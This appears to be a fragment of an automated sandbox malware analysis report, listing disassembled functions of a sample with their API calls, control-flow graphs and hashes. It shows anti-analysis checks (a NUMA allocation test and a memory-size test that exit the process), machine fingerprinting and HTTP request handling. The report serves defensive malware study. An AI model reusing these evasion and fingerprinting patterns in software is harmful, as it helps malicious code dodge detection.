                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$lstrcpy$CloseHandleHttp$FileOpenReadRequest$ConnectInfoOptionQuerySend
                          • String ID: ERROR$GET
                          • API String ID: 3687753495-3591763792
                          • Opcode ID: 84fc397a350302d3f22ad66b4208483340187c2c0e1adcff5cb74004122fee3a
                          • Instruction ID: 2bf411612e31e26a60ae916e5ce5cac2449530aaa8d8954b6d335e06bd6a1791
                          • Opcode Fuzzy Hash: 84fc397a350302d3f22ad66b4208483340187c2c0e1adcff5cb74004122fee3a
                          • Instruction Fuzzy Hash: 8C81A175A4121AABEB20DFA4DC49FEF7BB9BF44700F044159FA05E7280DB74AD848B94
                          Function 0052F2F8 Relevance: 30.1, APIs: 16, Strings: 1, Instructions: 391stringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrlen.KERNEL32(01196900), ref: 0052F315
                          • lstrcpy.KERNEL32(00000000,?), ref: 0052F3A3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0052F3C7
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0052F47B
                          • lstrcpy.KERNEL32(00000000,01196900), ref: 0052F4BB
                          • lstrcpy.KERNEL32(00000000,011A8880), ref: 0052F4EA
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0052F59E
                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 0052F61C
                          • lstrcpy.KERNEL32(00000000,?), ref: 0052F64C
                          • lstrcpy.KERNEL32(00000000,?), ref: 0052F69A
                          • StrCmpCA.SHLWAPI(?,ERROR), ref: 0052F718
                          • lstrlen.KERNEL32(011A88D0), ref: 0052F746
                          • lstrcpy.KERNEL32(00000000,011A88D0), ref: 0052F771
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0052F793
                          • lstrcpy.KERNEL32(00000000,?), ref: 0052F7E4
                          • StrCmpCA.SHLWAPI(?,ERROR), ref: 0052FA32
                          • lstrlen.KERNEL32(011A8930), ref: 0052FA60
                          • lstrcpy.KERNEL32(00000000,011A8930), ref: 0052FA8B
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0052FAAD
                          • lstrcpy.KERNEL32(00000000,?), ref: 0052FAFE
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen
                          • String ID: ERROR
                          • API String ID: 367037083-2861137601
                          • Opcode ID: 454ee51c981d8502a550357fe55a041ef653b0c8f5211ae12d33e70b33dd5b99
                          • Instruction ID: 3984892dcbd5b41017f26eedb280e3c72219a980151e2538a5a44c0e74905ca5
                          • Opcode Fuzzy Hash: 454ee51c981d8502a550357fe55a041ef653b0c8f5211ae12d33e70b33dd5b99
                          • Instruction Fuzzy Hash: 0CF14A34A01216CFDB24DF69F848A6ABBF5BF46314B18C0BED8099B2A1D735DC42CB54
                          Function 00528CA0 Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 176COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 2721 528ca0-528cc4 StrCmpCA 2722 528cc6-528cc7 ExitProcess 2721->2722 2723 528ccd-528ce6 2721->2723 2725 528ee2-528eef call 512a20 2723->2725 2726 528cec-528cf1 2723->2726 2727 528cf6-528cf9 2726->2727 2729 528ec3-528edc 2727->2729 2730 528cff 2727->2730 2729->2725 2770 528cf3 2729->2770 2732 528d30-528d3f lstrlen 2730->2732 2733 528e56-528e64 StrCmpCA 2730->2733 2734 528d5a-528d69 lstrlen 2730->2734 2735 528dbd-528dcb StrCmpCA 2730->2735 2736 528ddd-528deb StrCmpCA 2730->2736 2737 528dfd-528e0b StrCmpCA 2730->2737 2738 528e1d-528e2b StrCmpCA 2730->2738 2739 528e3d-528e4b StrCmpCA 2730->2739 2740 528d06-528d15 lstrlen 2730->2740 2741 528d84-528d92 StrCmpCA 2730->2741 2742 528da4-528db8 StrCmpCA 2730->2742 2743 528e88-528e9a lstrlen 2730->2743 2744 528e6f-528e7d StrCmpCA 2730->2744 2755 528d41-528d46 call 512a20 2732->2755 2756 528d49-528d55 call 512930 2732->2756 2733->2729 2751 528e66-528e6d 2733->2751 2757 528d73-528d7f call 512930 2734->2757 2758 528d6b-528d70 call 512a20 2734->2758 2735->2729 2761 528dd1-528dd8 2735->2761 2736->2729 2745 528df1-528df8 2736->2745 2737->2729 2746 528e11-528e18 2737->2746 2738->2729 2747 528e31-528e38 2738->2747 2739->2729 2748 528e4d-528e54 2739->2748 2749 528d17-528d1c call 512a20 2740->2749 2750 528d1f-528d2b call 512930 2740->2750 2741->2729 2760 528d98-528d9f 2741->2760 2742->2729 2753 528ea4-528eb0 call 512930 2743->2753 2754 528e9c-528ea1 call 512a20 2743->2754 2744->2729 2752 528e7f-528e86 2744->2752 2745->2729 2746->2729 2747->2729 2748->2729 2749->2750 2779 528eb3-528eb5 2750->2779 2751->2729 2752->2729 2753->2779 2754->2753 2755->2756 2756->2779 2757->2779 2758->2757 2760->2729 2761->2729 2770->2727 2779->2729 2780 528eb7-528eb9 2779->2780 2780->2729 2781 528ebb-528ebd lstrcpy 2780->2781 2781->2729
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitProcess
                          • String ID: block
                          • API String ID: 621844428-2199623458
                          • Opcode ID: 884d65b62789370f5ecaf17ea8eb0fb220085e864a840498f06e00742fedaf0f
                          • Instruction ID: d0995087035541404684ffecae6f4e389c49dcc6be416a38ef4197f2d5fc276b
                          • Opcode Fuzzy Hash: 884d65b62789370f5ecaf17ea8eb0fb220085e864a840498f06e00742fedaf0f
                          • Instruction Fuzzy Hash: 06518B31A057169BD7209FB5EC88A7B7FF8BF46704B144C2EE542D3690DB78E8818B25
                          Function 00532740 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 93memoryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 2782 532740-532783 GetWindowsDirectoryA 2783 532785 2782->2783 2784 53278c-5327ea GetVolumeInformationA 2782->2784 2783->2784 2785 5327ec-5327f2 2784->2785 2786 5327f4-532807 2785->2786 2787 532809-532820 GetProcessHeap RtlAllocateHeap 2785->2787 2786->2785 2788 532822-532824 2787->2788 2789 532826-532844 wsprintfA 2787->2789 2790 53285b-532872 call 5371e0 2788->2790 2789->2790
                          APIs
                          • GetWindowsDirectoryA.KERNEL32(00000000,00000104,00000000,00000000,00000000), ref: 0053277B
                          • GetVolumeInformationA.KERNEL32(?,00000000,00000000,005293B6,00000000,00000000,00000000,00000000), ref: 005327AC
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 0053280F
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00532816
                          • wsprintfA.USER32 ref: 0053283B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowswsprintf
                          • String ID: :\$C
                          • API String ID: 2572753744-3309953409
                          • Opcode ID: c20a842347b8c6c5147c9b39a551770c8e5cdd830f8e02518c4e85cbbc5de8f5
                          • Instruction ID: ef6d325b54a2787ce642e88c6d84906f3b8074921d7af5553ce8d8e41087ad94
                          • Opcode Fuzzy Hash: c20a842347b8c6c5147c9b39a551770c8e5cdd830f8e02518c4e85cbbc5de8f5
                          • Instruction Fuzzy Hash: 4A316DB1D08209ABCB14CFB889859EFFFBCFF59710F10416AE505E7650E3349A408BA6
                          Function 00514BC0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 50stringnetworkCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 2793 514bc0-514bce 2794 514bd0-514bd5 2793->2794 2794->2794 2795 514bd7-514c48 ??2@YAPAXI@Z * 3 lstrlen InternetCrackUrlA call 512a20 2794->2795
                          APIs
                          • ??2@YAPAXI@Z.MSVCRT(00000800,?), ref: 00514BF7
                          • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00514C01
                          • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00514C0B
                          • lstrlen.KERNEL32(?,00000000,?), ref: 00514C1F
                          • InternetCrackUrlA.WININET(?,00000000), ref: 00514C27
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ??2@$CrackInternetlstrlen
                          • String ID: <
                          • API String ID: 1683549937-4251816714
                          • Opcode ID: 61c0ee92fd861e44cbfe8b0695845a4143510a1a45c3dfa18194a885ded27da8
                          • Instruction ID: 2261fbaec850444422d8cdb585bcaf1187a80326a76fc0e0b57706273d46f1d3
                          • Opcode Fuzzy Hash: 61c0ee92fd861e44cbfe8b0695845a4143510a1a45c3dfa18194a885ded27da8
                          • Instruction Fuzzy Hash: D6012D71D00218ABEB54DFA8EC49B9EBBB8EB59364F008126F914E7390EB7459048FD5
                          Function 00511030 Relevance: 7.6, APIs: 5, Instructions: 55memoryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 2798 511030-511055 GetCurrentProcess VirtualAllocExNuma 2799 511057-511058 ExitProcess 2798->2799 2800 51105e-51107b VirtualAlloc 2798->2800 2801 511082-511088 2800->2801 2802 51107d-511080 2800->2802 2803 5110b1-5110b6 2801->2803 2804 51108a-5110ab VirtualFree 2801->2804 2802->2801 2804->2803
                          APIs
                          • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00511046
                          • VirtualAllocExNuma.KERNEL32(00000000), ref: 0051104D
                          • ExitProcess.KERNEL32 ref: 00511058
                          • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 0051106C
                          • VirtualFree.KERNEL32(00000000,17C841C0,00008000), ref: 005110AB
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Virtual$AllocProcess$CurrentExitFreeNuma
                          • String ID:
                          • API String ID: 3477276466-0
                          • Opcode ID: 457b1549a889e9480de0a067cee71de1c82c346551dc7bfb46d48cbb4ffe1367
                          • Instruction ID: f453e10ce53eed307bbeac6e5c4a1d35f1753c379551def5fbac9dfd552fa7df
                          • Opcode Fuzzy Hash: 457b1549a889e9480de0a067cee71de1c82c346551dc7bfb46d48cbb4ffe1367
                          • Instruction Fuzzy Hash: 4A01F479B40204BBF7205A656C5EFAB7BADA786B11F30C015F704E72D0DAB5ED00866C
                          Function 0052EE90 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 2805 52ee90-52eeb5 call 512930 2808 52eeb7-52eebf 2805->2808 2809 52eec9-52eecd call 516c40 2805->2809 2808->2809 2810 52eec1-52eec3 lstrcpy 2808->2810 2812 52eed2-52eee8 StrCmpCA 2809->2812 2810->2809 2813 52ef11-52ef18 call 512a20 2812->2813 2814 52eeea-52ef02 call 512a20 call 512930 2812->2814 2820 52ef20-52ef28 2813->2820 2823 52ef04-52ef0c 2814->2823 2824 52ef45-52efa0 call 512a20 * 10 2814->2824 2820->2820 2822 52ef2a-52ef37 call 512930 2820->2822 2822->2824 2831 52ef39 2822->2831 2823->2824 2827 52ef0e-52ef0f 2823->2827 2830 52ef3e-52ef3f lstrcpy 2827->2830 2830->2824 2831->2830
                          APIs
                          • lstrcpy.KERNEL32(00000000,?), ref: 0052EEC3
                          • StrCmpCA.SHLWAPI(?,ERROR), ref: 0052EEDE
                          • lstrcpy.KERNEL32(00000000,ERROR), ref: 0052EF3F
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy
                          • String ID: ERROR
                          • API String ID: 3722407311-2861137601
                          • Opcode ID: 896ce42164c3be52c1666dc9245c86502082ec63ee9bb1deb8d0c54d6e9bae87
                          • Instruction ID: 2c8b5ba8cf3e771418e8cc470cd8ccac4445b91c03b92f1316577cad84da28cb
                          • Opcode Fuzzy Hash: 896ce42164c3be52c1666dc9245c86502082ec63ee9bb1deb8d0c54d6e9bae87
                          • Instruction Fuzzy Hash: B02121306602579BDB21FF79ED4AADA3FA5BF51300F005424B84ADB252DB70DCA08B90
                          Function 005110C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 2886 5110c0-5110cb 2887 5110d0-5110dc 2886->2887 2889 5110de-5110f3 GlobalMemoryStatusEx 2887->2889 2890 511112-511114 ExitProcess 2889->2890 2891 5110f5-511106 2889->2891 2892 511108 2891->2892 2893 51111a-51111d 2891->2893 2892->2890 2894 51110a-511110 2892->2894 2894->2890 2894->2893
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitGlobalMemoryProcessStatus
                          • String ID: @
                          • API String ID: 803317263-2766056989
                          • Opcode ID: c6b0fbf1bbfef6b8989309af2475b7fcbcd326b7f46fb1922365f4ccc05deeae
                          • Instruction ID: c61a60b01cb856dd6ada60cb5e7d1316731a14b2e3b7b947359ac27a811a1fea
                          • Opcode Fuzzy Hash: c6b0fbf1bbfef6b8989309af2475b7fcbcd326b7f46fb1922365f4ccc05deeae
                          • Instruction Fuzzy Hash: E7F02E7450464557FB10AA74D80A39EFFD8F705390F104969DF9AC2191E330C8C0C12F
                          Function 00528C88 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 2895 528c88-528cc4 StrCmpCA 2898 528cc6-528cc7 ExitProcess 2895->2898 2899 528ccd-528ce6 2895->2899 2901 528ee2-528eef call 512a20 2899->2901 2902 528cec-528cf1 2899->2902 2903 528cf6-528cf9 2902->2903 2905 528ec3-528edc 2903->2905 2906 528cff 2903->2906 2905->2901 2946 528cf3 2905->2946 2908 528d30-528d3f lstrlen 2906->2908 2909 528e56-528e64 StrCmpCA 2906->2909 2910 528d5a-528d69 lstrlen 2906->2910 2911 528dbd-528dcb StrCmpCA 2906->2911 2912 528ddd-528deb StrCmpCA 2906->2912 2913 528dfd-528e0b StrCmpCA 2906->2913 2914 528e1d-528e2b StrCmpCA 2906->2914 2915 528e3d-528e4b StrCmpCA 2906->2915 2916 528d06-528d15 lstrlen 2906->2916 2917 528d84-528d92 StrCmpCA 2906->2917 2918 528da4-528db8 StrCmpCA 2906->2918 2919 528e88-528e9a lstrlen 2906->2919 2920 528e6f-528e7d StrCmpCA 2906->2920 2931 528d41-528d46 call 512a20 2908->2931 2932 528d49-528d55 call 512930 2908->2932 2909->2905 2927 528e66-528e6d 2909->2927 2933 528d73-528d7f call 512930 2910->2933 2934 528d6b-528d70 call 512a20 2910->2934 2911->2905 2937 528dd1-528dd8 2911->2937 2912->2905 2921 528df1-528df8 2912->2921 2913->2905 2922 528e11-528e18 2913->2922 2914->2905 2923 528e31-528e38 2914->2923 2915->2905 2924 528e4d-528e54 2915->2924 2925 528d17-528d1c call 512a20 2916->2925 2926 528d1f-528d2b call 512930 2916->2926 2917->2905 2936 528d98-528d9f 2917->2936 2918->2905 2929 528ea4-528eb0 call 512930 2919->2929 2930 528e9c-528ea1 call 512a20 2919->2930 2920->2905 2928 528e7f-528e86 2920->2928 2921->2905 2922->2905 2923->2905 2924->2905 2925->2926 2955 528eb3-528eb5 2926->2955 2927->2905 2928->2905 2929->2955 2930->2929 2931->2932 2932->2955 2933->2955 2934->2933 2936->2905 2937->2905 2946->2903 2955->2905 2956 528eb7-528eb9 2955->2956 2956->2905 2957 528ebb-528ebd lstrcpy 2956->2957 2957->2905
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
